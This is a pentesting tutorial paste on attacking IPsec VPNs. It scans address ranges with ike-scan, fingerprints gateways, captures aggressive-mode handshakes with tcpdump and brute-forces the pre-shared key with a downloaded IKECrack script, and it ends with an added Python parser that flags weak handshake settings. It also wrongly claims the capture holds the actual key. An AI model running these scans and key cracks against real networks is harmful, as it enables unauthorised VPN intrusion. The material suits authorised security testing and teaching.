joemccray

Old Skewl VPN Pentesting

Jan 22nd, 2018
################
# VPN Auditing #
################


####################
# Install IKE-Scan #
####################

---------------------------Type This-----------------------------------

sudo apt-get install -y ike-scan

wget https://raw.githubusercontent.com/0x90/wifi-arsenal/master/IKECrack/ikecrack-snarf-1.00.pl

-----------------------------------------------------------------------


#############
# Discovery #
#############

---------------------------Type This-----------------------------------

[root@Linux j0e]# ike-scan -M 24.24.0.0/16 <--- Discovery of VPNs


[root@Linux j0e]# ike-scan -M --aggressive 24.24.0.0/16 <--- Discovery of VPNs in aggressive mode

-----------------------------------------------------------------------


##################
# Fingerprinting #
##################

---------------------------Type This-----------------------------------

[root@Linux j0e]# ike-scan -M --trans=5,2,1,2 --showbackoff 24.24.1.151 <--- Fingerprinting
-----------------------------------------------------------------------


*** If you are really having trouble figuring out what the VPN is, try some different transforms.
-----------------------------------------------------------------------
#!/bin/sh
# generate-transforms.sh
# Encryption algorithms: DES, Triple-DES, AES/128, AES/192 and AES/256
ENCLIST="1 5 7/128 7/192 7/256"
# Hash algorithms: MD5 and SHA1
HASHLIST="1 2"
# Authentication methods: Pre-Shared Key, RSA Signatures, Hybrid Mode and XAUTH
AUTHLIST="1 3 64221 65001"
# Diffie-Hellman groups: 1, 2 and 5
GROUPLIST="1 2 5"
#
# Emit one --trans=enc,hash,auth,group option per combination (5*2*4*3 = 120 lines)
for ENC in $ENCLIST; do
    for HASH in $HASHLIST; do
        for AUTH in $AUTHLIST; do
            for GROUP in $GROUPLIST; do
                echo "--trans=$ENC,$HASH,$AUTH,$GROUP"
            done
        done
    done
done
-----------------------------------------------------------------------
---------------------------Type This-----------------------------------
[root@Linux j0e]# sh generate-transforms.sh | xargs --max-lines=8 ike-scan 24.24.1.151 <--- Fingerprinting

[root@Linux j0e]# ike-scan -M `perl -e 'print "--trans=2,3,4,5 " x 20 . "--trans 5,2,1,2";'` 24.24.1.151

[root@Linux j0e]# ike-scan --trans=5,2,1,2 --vendor=4048b7d56ebce88525e7de7f00d6c2d3c0000000 --multiline 24.24.1.151

-----------------------------------------------------------------------
################
# PSK Cracking #
################

---------------------------Type This-----------------------------------
[root@Linux toolz]# /usr/sbin/tcpdump -nxq > logfile.dat
-----------------------------------------------------------------------

or

---------------------------Type This-----------------------------------
windump -nxq -s 1500 port 500 > logfile.dat
-----------------------------------------------------------------------

*****make connection attempt with VPN client, then stop the log capture.*****
Because the VPN uses PSK you can do this without a password, so this logfile
will contain the actual PSK, and ikecrack-snarf will bruteforce it for you.

You have to attempt your connection with the VPN client software for that
specific VPN, and the VPN needs to be in aggressive mode.

---------------------------Type This-----------------------------------

[root@Linux toolz]# perl ikecrack-snarf-1.00.pl 24.24.1.151.500
-----------------------------------------------------------------------

*****IKECrack by default looks for "logfile.dat" in the current directory*****


----------------------------------------------------------------------------------------------------------------------

---------------------------Type This-----------------------------------
[root@LinuxLaptop toolz]# ike-scan -M 24.24.1.0/24
-----------------------------------------------------------------------

Starting ike-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/ike-scan/)
24.24.1.0    Notify message 14 (NO-PROPOSAL-CHOSEN)
    HDR=(CKY-R=ba78bba863d98025)
24.24.1.1    Notify message 14 (NO-PROPOSAL-CHOSEN)
    HDR=(CKY-R=e9ba2df614761ad3)
24.24.1.2    Notify message 14 (NO-PROPOSAL-CHOSEN)
24.24.1.151  Main Mode Handshake returned
    HDR=(CKY-R=30a3910882ffea48)
    SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
24.24.1.162  Notify message 14 (NO-PROPOSAL-CHOSEN)
    HDR=(CKY-R=0000000000000000)
24.24.1.169  (24.24.1.162) Notify message 14 (NO-PROPOSAL-CHOSEN)
    HDR=(CKY-R=0000000000000000)
24.24.1.236  Main Mode Handshake returned
    HDR=(CKY-R=f31f790c32b65404)
    SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 256 hosts scanned in 39.640 seconds (6.46 hosts/sec). 2 returned handshake; 12 returned notify

---------------------------Type This-----------------------------------
[root@LinuxLaptop toolz]# ike-scan -M --trans=5,2,1,2 --showbackoff 24.24.1.151
-----------------------------------------------------------------------

Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
24.24.1.151  Main Mode Handshake returned
    HDR=(CKY-R=82c51aa0ae799258)
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)


IKE Backoff Patterns:

IP Address     No.  Recv time           Delta Time
24.24.1.151    1    1182310337.727521   0.000000
24.24.1.151    2    1182310345.723607   7.996086
24.24.1.151    3    1182310353.723382   7.999775
24.24.1.151    4    1182310361.724154   8.000772
24.24.1.151    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.191 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
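Reading -M output by hand across a whole range gets tedious, so here is a small parser added as an example (it is not part of the original paste and not ike-scan's own code) that groups the multiline output into one record per host and reports the handshake parameters a VPN audit would write up: PSK authentication, DES/3DES, MD5 and DH groups 1 and 2. The sample input is copied from the /24 scan above; the record layout and the WEAK table are this example's own choices.

```python
import re
# Sample `ike-scan -M` output, copied from the /24 scan transcript above (three of
# the hosts). Real ike-scan indents continuation lines with a tab, as here.
SAMPLE = """\
Starting ike-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/ike-scan/)
24.24.1.0\tNotify message 14 (NO-PROPOSAL-CHOSEN)
\tHDR=(CKY-R=ba78bba863d98025)
24.24.1.151\tMain Mode Handshake returned
\tHDR=(CKY-R=30a3910882ffea48)
\tSA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tVID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
24.24.1.236\tMain Mode Handshake returned
\tHDR=(CKY-R=f31f790c32b65404)
\tSA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tVID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 256 hosts scanned in 39.640 seconds (6.46 hosts/sec). 2 returned handshake; 12 returned notify
"""

HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(.*)$")
WEAK = {"Enc": {"DES", "3DES"}, "Hash": {"MD5"}, "Group": {"1", "2"}}  # Group matched on its number

def parse_ike_scan(text):
    """Group multiline (-M) output into {ip: {"status", "sa", "vid"}}."""
    hosts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:  # a line starting with an IP opens a new host record
            current = hosts.setdefault(m.group(1), {"status": m.group(2), "sa": {}, "vid": []})
        elif current and line.startswith("SA=("):  # SA=(Enc=3DES Hash=MD5 ...)
            for item in line[4:].rstrip(")").split():
                key, _, value = item.partition("=")
                current["sa"][key] = value
        elif current and line.startswith("VID="):  # keep the hex ID, drop the label
            current["vid"].append(line[4:].split()[0])
    return hosts

def audit(hosts):
    """Return {ip: [issues]} for hosts that completed a handshake on a weak proposal."""
    findings = {}
    for ip, rec in hosts.items():
        if "Handshake returned" not in rec["status"]:
            continue  # NO-PROPOSAL-CHOSEN etc. says nothing about accepted parameters
        sa = rec["sa"]
        issues = [f"{k}={sa[k]}" for k, bad in WEAK.items() if sa.get(k, "").split(":")[0] in bad]
        if sa.get("Auth") == "PSK":
            issues.append("Auth=PSK")
        if issues:
            findings[ip] = issues
    return findings
```

Feed it the saved output of `ike-scan -M` (and of the `--aggressive` run) to get one line of issues per responding gateway instead of scrolling the raw transcript.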